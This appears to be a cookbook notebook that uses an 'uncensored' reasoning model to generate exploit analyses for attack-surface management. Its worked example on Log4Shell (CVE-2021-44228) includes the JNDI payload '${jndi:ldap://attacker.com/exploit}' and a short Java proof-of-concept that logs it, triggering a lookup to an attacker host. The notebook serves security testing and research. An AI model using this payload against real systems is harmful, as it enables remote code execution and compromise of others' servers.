# Use Case Description

Move beyond just identifying exposed assets or CVEs — leverage a powerful uncensored AI model to simulate how each vulnerability in the attack surface could realistically be exploited. This isn't just ASM, it's ASM + Exploit Generation, where the model takes in asset info and vulnerability metadata, and outputs actual attack paths or even exploit code (in safe/internal environments).

## Model used for this use case
Both Instruct Model and Reasoning Model would be suitable for this task. In this example, we used Reasoning Model.

## SetUp

The setup scripts below are essentially the same as those in the [Quickstart (Reasoning Model)](https://github.com/RobustIntelligence/foundation-ai-cookbook/blob/main/1_quickstarts/Preview_Quickstart_reasoning_model.ipynb)

### Notice
- The code below assumes that users have access to the models via Hugging Face. If you are using API access instead, please replace the inference code with the API version provided in the Quickstart guide.
- This model is currently in preview mode and may receive updates. As a result, outputs can vary even when parameters are configured to ensure reproducibility.

In [1]:
import os
import transformers
import torch
from IPython.display import display, Markdown

HF_TOKEN = os.getenv("HF_TOKEN")

def _get_device():
    if torch.cuda.is_available():
        return "cuda"
    elif torch.backends.mps.is_available():
        return "mps"
    else:
        return "cpu"

DEVICE = _get_device()

In [2]:
MODEL_ID = "" # To be relaced with the final model name

from transformers import AutoModelForCausalLM, AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(MODEL_ID, token=HF_TOKEN)
model = AutoModelForCausalLM.from_pretrained(
    pretrained_model_name_or_path=MODEL_ID,
    device_map="auto",
    torch_dtype=torch.float32, # this model's tensor_type is float32
    token=HF_TOKEN,
)

Loading checkpoint shards:   0%|          | 0/7 [00:00<?, ?it/s]

In [4]:
generation_args = {
    "max_new_tokens": 1024,
    "temperature": None,
    "repetition_penalty": 1.2,
    "do_sample": False,
    "use_cache": True,
    "eos_token_id": tokenizer.eos_token_id,
    "pad_token_id": tokenizer.pad_token_id,
}

In [8]:
import re

def inference(prompt):
    messages = [
        {"role": "user", "content": prompt},
    ]
    inputs = tokenizer.apply_chat_template(
        messages, tokenize=False, add_generation_prompt=True
    )

    # The old model version didn’t include the <think> token in the chat template.
    think_token = "<think>\n"
    if not inputs.endswith(think_token):
        inputs += think_token
    
    inputs = tokenizer(inputs, return_tensors="pt").to(DEVICE)
    with torch.no_grad():
        outputs = model.generate(
            **inputs,
            **generation_args,
        )
    response = tokenizer.decode(outputs[0], skip_special_tokens = False)

    # extract the thinking part only
    match = re.search(r"<think>(.*?)<\|end_of_text\|>", response, re.DOTALL)
    
    return match.group(1).strip()

## Exploit Analysis

In [6]:
def make_prompt(vuln_description):
    return f"""You are a security researcher. Analyze the following vulnerability report and generate:
    
    1. A concise summary of the issue.
    2. Potential impact and affected components.
    3. A safe, hypothetical proof-of-concept exploit (for testing only).
    
    ## VULNERABILITY DESCRIPTION
    {vuln_description}
    
    Ensure the response is for red team / security testing only — no real-world systems or harm implied."""

Given the vulnerability report of CVE-2021-44228, have the model to reason and generate a document containing the contents above

In [10]:
vuln_description = """
CVE-2021-44228: Log4Shell Remote Code Execution in Apache Log4j

Description:
A critical remote code execution vulnerability exists in Apache Log4j versions 2.0 to 2.14.1. This flaw allows a remote attacker to execute arbitrary code on the affected system by sending specifically crafted JNDI (Java Naming and Directory Interface) lookup strings through various input vectors. The vulnerability occurs because Log4j evaluates JNDI expressions that can load malicious code from remote servers. Successful exploitation could lead to complete system compromise including data theft, lateral movement within networks, and installation of malware or ransomware.

Triggering Mechanism:
The vulnerability is triggered when Log4j logs a string containing a specific format like "${jndi:ldap://malicious-server/payload}". When this string is processed, Log4j evaluates the JNDI lookup, which can connect to an attacker-controlled LDAP server and load malicious Java code. This can be triggered through various vectors including:
- HTTP headers
- User-agent strings
- Input form fields
- Any other data that might be logged

Affected Software:
- Apache Log4j versions 2.0 to 2.14.1
- Thousands of applications and services using vulnerable Log4j versions including:
  - Apache Struts
  - Apache Solr
  - Apache Druid
  - Elasticsearch
  - Apache Kafka
  - Minecraft servers
  - VMware Horizon
  - Many commercial enterprise products and cloud services

References:
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- CISA Advisory: https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a
- Apache Log4j Security Vulnerabilities: https://logging.apache.org/log4j/2.x/security.html
"""


In [11]:
response = inference(make_prompt(vuln_description))
display(Markdown(response))

## Summary of Issue

**Vulnerability:** CVE-2021-44228 – Log4Shell RCE in Apache Log4j  
**Severity:** Critical  
**Description:** Apache Log4j versions 2.0 to 2.14.1 contain a remote code execution vulnerability due to improper handling of JNDI lookups. An attacker can send specially crafted log messages with embedded JNDI variables leading to loading of remote code via LDAP. 

**Impact & Affected Components**

* **Potential Impact:** Complete system compromise; attackers may steal sensitive data, move laterally across networks, install malware/ransomware.
* **Affected Components:** 
   * Directly: All applications utilizing Log4j v2.0-2.14.1.
   * Indirectly: Various software relying on these Log4j versions such as Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Kafka, Minecraft servers, VMware Horizon, etc., potentially affecting thousands of services worldwide.

## Hypothetical Proof-of-Concept Exploit (For Testing Only)

To demonstrate the vulnerability without causing actual damage, here's a theoretical POC:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class PoC {
    private static final Logger logger = LogManager.getLogger(PoC.class);

    public static void main(String[] args) {
        // Trigger the vulnerability by logging a message with a crafted JNDI string
        String payload = "${jndi:ldap://attacker.com/exploit}";
        
        try {
            logger.error("This is a test: " + payload);
        } catch (Exception e) {
            System.out.println("Log4Shell POC executed successfully.");
        }
    }
}
```

### Important Notes:
* **Testing Environment:** Use a controlled environment where you have explicit permission to perform tests. Do not run this against any production or unauthorized systems.
* **Mitigation Steps:** Before running, ensure your own setup mirrors a vulnerable version of Log4j (e.g., 2.12). Apply fixes immediately after testing. In reality, upgrading to version 2.15.0 or applying the recommended configuration changes (`log4j2.formatMsgNoLookups` set to `true`) would prevent exploitation.
* **Ethical Considerations:** Always adhere to ethical guidelines. Unauthorized use of exploits is illegal and unethical.